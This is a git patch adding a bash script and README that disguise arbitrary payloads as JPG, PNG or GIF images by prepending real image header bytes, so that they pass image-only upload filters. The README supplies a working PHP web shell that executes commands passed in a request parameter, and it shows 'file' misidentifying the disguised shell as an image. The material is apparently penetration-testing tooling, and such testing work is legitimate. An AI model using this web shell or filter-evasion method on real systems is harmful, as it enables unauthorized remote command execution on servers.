From 62e95a50ef5b811033daaf600f8fe6b4904913de Mon Sep 17 00:00:00 2001
From: Jonathan Hodgson <git@jonathanh.co.uk>
Date: Thu, 12 Sep 2019 21:02:35 +0100
Subject: [PATCH] Makes a script to disguise a payload as an image

---
 bin/.bin/payload-generation/README.md         |  36 ++++++++++
 .../generateImageFromPayload                  |  65 ++++++++++++++++++
 .../payload-generation/templates/README.md    |   5 ++
 .../payload-generation/templates/payload.gif  | Bin 0 -> 20 bytes
 .../payload-generation/templates/payload.jpg  | Bin 0 -> 20 bytes
 .../payload-generation/templates/payload.png  | Bin 0 -> 21 bytes
 6 files changed, 106 insertions(+)
 create mode 100644 bin/.bin/payload-generation/README.md
 create mode 100755 bin/.bin/payload-generation/generateImageFromPayload
 create mode 100644 bin/.bin/payload-generation/templates/README.md
 create mode 100644 bin/.bin/payload-generation/templates/payload.gif
 create mode 100644 bin/.bin/payload-generation/templates/payload.jpg
 create mode 100644 bin/.bin/payload-generation/templates/payload.png

diff --git a/bin/.bin/payload-generation/README.md b/bin/.bin/payload-generation/README.md
new file mode 100644
index 00000000..07fcd4f5
--- /dev/null
+++ b/bin/.bin/payload-generation/README.md
@@ -0,0 +1,36 @@
+# Scripts for payload generation
+
+## generateImageFromPayload
+
+This script is designed to disguise a payload as an image. It does this by adding the first 20 bytes of a real image to the beginning of the file and adding a file extension. This will fool most filters that, for example, might only allow images to be uploaded.
+
+To use it, you will need to have a payload ready to use. It could be anything, here is a simple php script named payload.php
+
+```php
+<?php
+if( isset( $_REQUEST['jh'] ) ):
+	system( $_REQUEST['jh'] );
+endif;
+```
+
+If I run `generateImageFromPayload payload.php`, the script will create a file called `payload.php.jpg`.
+
+```
+.
+├── payload.php
+└── payload.php.jpg
+```
+
+After running `file` on both, you will see that it incorrectly identifies the second as an image.
+
+```sh
+file payload.php*
+payload.php:     PHP script, ASCII text
+payload.php.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16
+```
+
+The script will, by default, generate a jpg although you can specify png or gif by adding a second argument, e.g.
+
+```
+generateImageFromPayload payload.php png
+```
diff --git a/bin/.bin/payload-generation/generateImageFromPayload b/bin/.bin/payload-generation/generateImageFromPayload
new file mode 100755
index 00000000..0a0e5b48
--- /dev/null
+++ b/bin/.bin/payload-generation/generateImageFromPayload
@@ -0,0 +1,65 @@
+#!/usr/bin/env bash
+
+# This script takes a payload and disguises it as an image.
+
+SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )"
+CURRENT=$(pwd)
+
+PAYLOAD="$1"
+IMAGETYPE="${2:-jpg}"
+# Make sure the image type is lower case
+IMAGETYPE=$(echo "$IMAGETYPE" | tr '[:upper:]' '[:lower:]')
+
+# This function prints the usage
+function printUsage(){
+	echo "Usage: $(basename "$0") PAYLOAD TYPE"
+	echo ""
+	echo "Disguises a payload as an image"
+	echo ""
+	echo -e "PAYLOAD\t\tThe payload to use, currently only supports a file in CWD (Required)"
+	echo -e "TYPE\t\tThe type of image (jpg, png, gif) (default: jpg)"
+}
+
+function getPayload(){
+	local payload="$CURRENT/$PAYLOAD"
+	echo "$payload"
+	if [ -f "$payload" ]; then
+		exit 0
+	else
+		# Add stuff here if we want to look in another folder for payloads at some point
+		exit 1
+	fi
+}
+
+function getTemplate(){
+	local template="$SCRIPTPATH/templates/payload.$IMAGETYPE"
+	echo "$template"
+	if [ -f "$template" ]; then
+		exit 0
+	else
+		exit 1
+	fi
+}
+
+function getDestination(){
+	echo "$CURRENT/$PAYLOAD.$IMAGETYPE"
+	exit 0
+}
+
+if template=$(getTemplate); then
+	if payload=$(getPayload); then
+		# Do copy stuff
+		destination=$(getDestination)
+		cp "$template" "$destination"
+		cat "$payload" >> $destination
+	else
+		"No such payload $payload"
+		echo ""
+		printUsage
+	fi
+else
+	echo "No such template $template"
+	echo ""
+	printUsage
+	exit 1
+fi
diff --git a/bin/.bin/payload-generation/templates/README.md b/bin/.bin/payload-generation/templates/README.md
new file mode 100644
index 00000000..ce24da71
--- /dev/null
+++ b/bin/.bin/payload-generation/templates/README.md
@@ -0,0 +1,5 @@
+# Image templates
+
+These images are not real images. They take the first 20 bites of an example image of each type.
+
+By adding code to these, you will be able to evade many upload filters that only allow images
diff --git a/bin/.bin/payload-generation/templates/payload.gif b/bin/.bin/payload-generation/templates/payload.gif
new file mode 100644
index 0000000000000000000000000000000000000000..bcfe4d1552cdc623296a5a0bbb03cf1da1801291
GIT binary patch
literal 20
bcmZ?wbhEHbbYO5`c>bS(iItI&or@O$HP!?+

literal 0
HcmV?d00001

diff --git a/bin/.bin/payload-generation/templates/payload.jpg b/bin/.bin/payload-generation/templates/payload.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..47ddd39be3b7a0803f84b147022677cb2374714c
GIT binary patch
literal 20
acmex=<NpH&0WUXCHwH!^&|%bJU;qGBPz6H(

literal 0
HcmV?d00001

diff --git a/bin/.bin/payload-generation/templates/payload.png b/bin/.bin/payload-generation/templates/payload.png
new file mode 100644
index 0000000000000000000000000000000000000000..3334731bba68326f13778dc90c1c344ba400c3cb
GIT binary patch
literal 21
acmeAS@N?(olHy`uVBq!ia0vp^4qN~!jsqwF

literal 0
HcmV?d00001